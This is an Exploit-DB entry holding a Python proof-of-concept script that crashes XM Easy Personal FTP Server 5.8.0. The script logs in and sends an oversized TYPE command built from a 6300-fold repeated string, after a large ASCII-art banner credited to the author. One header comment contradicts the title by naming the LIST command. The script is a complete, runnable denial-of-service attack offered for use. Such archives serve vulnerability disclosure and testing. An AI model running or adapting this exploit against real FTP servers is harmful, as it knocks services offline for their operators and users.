XM Easy Personal FTP Server 5.8.0 - 'TYPE' Denial of Service

EDB-ID:

16150

CVE:

N/A
Platform:

Windows

Date:

2011-02-10


#!/usr/bin/python
#
# Exploit Title : XM Easy Personal FTP Server 5.8.0 Denial Of Service LIST command
# Date: 10/02/2011
# Author: Houssam Sahli
# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe
# Version: 5.8.0
# Tested on: Windows XP SP3 French

#!/usr/bin/python
print "\n2ctUtjjJUJUJUJUJjJUJtJtJUUtjfUtt2UftftfUftft1t1tFfF21fhf11Ft"
print "ULcYLYLYLcLc7LLcLccJcJYJYJYjJtJjJtjtJtJtUtjUJjJUJtJUJtjtUtUj"
print "tLUJjJJcJcJcJcJYjhPX0Pb99pb9EbMEDEDEMDZbZDD0XfFf1f2tFf22F21U"
print "JYJJcJcJcJcJcJcJ2              1hf1f1f1212h2h1f"
print "ULJcJcJLYLL7L7L71   Houssam Sahli    1h1f2f2fFt1fF1Ft"
print "ULJcJcJLYLL7L7L71  backtronux@gmail.com  1h1f2f2fFt1fF1Ft"
print "JccJcY7Lr7777LrLY              1ht2t1t1f1t12F12"
print "J7JLcr7r777777L7cUF1hfU7r:i:i:i:rirrj2MRQMMbhf1t2t1tFf1f1tFU"
print "Y7cLr777r7rrrrrrrLr:, .LPRQQQQQQQQDX7:.:7SpXfFt1f1t121th2Fft"
print "J7crc77rriririri: ,:tQQQQQQQQQQQQQQQQQRJ:,i19FFf1t2f2f21hfFU"
print "Y7r777rrii:i::: JQQQQQQPFfS0MM02hftXQRZPc, ipXSf1t2t1t1fF2f"
print "Jr777rrii::::, ,QQQQQQQi..::::i:irRR.,hfL7L: JpSf1tFt12h1Ft"
print "cr7c77rri::: 7QQQQQQQ1:Et7jjJ7Lrr7r. ci::i7. iPS22fFf12F12"
print "Jr7LLrrir:i EQQQQQQQQr:QQQQQ9L7Lri.,  i.::rtY :hSf1f121fFU"
print "c7rL77rrrr. DQQQQQQQQQ:::riri77c77i.  .ri7LfE9 ihh2Ffhfhf2"
print "j7crc77r7i UQQQjrir:rQQFcii:ii77Lrr.,  f11PpZQZ.JFF1h2F1hf"
print "JLcLrLLLL..QQQc.irr7i0QQQQQMhUrr7Lrr:., :Q9QQQQQQh:1t2tft1f2"
print "J7Jcc7LLJ cQQQQL:i777irUMQQQQQQL77L77rr:pJ:7PQQQQQ:Jhf1tFt2J"
print "JccJcc7c7 2QQQQQE7:r7Lri:r7hDQQQ7LLYLJLc7rrr::XQQQ.jFF1h1h11"
print "tLjJJcJJJ bQQQQQQQRULr77Lrriii7LcLYLYLYLLLc77:cQQQ7cX2h2h2hf"
print "jJJUJjJtY 0QQQQQQQQQ0Mt7rrr777777L7LLcLc7c77::ZQQQJJFh2h2FF1"
print "tLUjjYUjt,tQQQQQQQS .QQQF7iiirr77L7L7L77ii:LMQQQQ72S1h1h1Sf"
print "tjjtjjJff:.QQQQQQQQ  ::QQQMpftJc7c77rriLhQQQQQQf:02h1h1F12"
print "2J2UfUttFJ,Q:   QQb   YQQQQQQQQQQQQQQQQQQQQQQ tXF2F1F2hU"
print "fjf2Uft2thrr    :L, ,        QQQQQQQQQribF2h2F1h22"
print "FJ1t2t2t22hrt, ,   ,,, ,  tPJ7  :QQQQQQQQU:bS2h2hfF2h2"
print "tUt1t2f1t11SLS. ,,,,,,,,,,,,, .rt.  QQQ1Sp1p2r9Xfh2h2F2h1F"
print "1J1t2t1t2t12SYhr  ,,,,,,,,,,,   .QQF.  .tbS2F1F2F1F1hf"
print "ftf1f1f1t2f12Xt2L.  ,,,,,,,,,,,,, fQf   .fR0Ffh1h1h2h1F21"
print "hUFt1t1f2t2t1fXhFUL:    , , , :   .jRRSF2h2h1h1SFF2Sf"
print "2f2FfF2Ff12122fhFphhJ7:.       ,:JpRR0212FFh1S1h2hFhF1"
print "hUF21fFf12Ffh2F2h1XX9X9SXffjUccLcJtfpERZESh1hFhFSFS1hFS1S1Sf\n"

print "\nYou need a valid account to succeed this DoS, but even anonymous can do it as long as it has permission to call TYPE command.\n"

import socket
import sys
 
def Usage():
  print ("Usage: ./expl.py <host> <Username> <password>\n")
buffer= "./A" * 6300
def start(hostname, username, passwd):
  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  try:
    sock.connect((hostname, 21))
  except:
    print ("[-] Connection error!")
    sys.exit(1)
  r=sock.recv(1024)
  print "[+] " + r
  sock.send("user %s\r\n" %username)
  r=sock.recv(1024)
  sock.send("pass %s\r\n" %passwd)
  r=sock.recv(1024)
  print "[+] Send malicious string"
  sock.send("TYPE %s\r\n" %buffer)
  sock.close()
 
if len(sys.argv) <> 4:
  Usage()
  sys.exit(1)
else:
  hostname=sys.argv[1]
  username=sys.argv[2]
  passwd=sys.argv[3]
  start(hostname,username,passwd)
  sys.exit(0)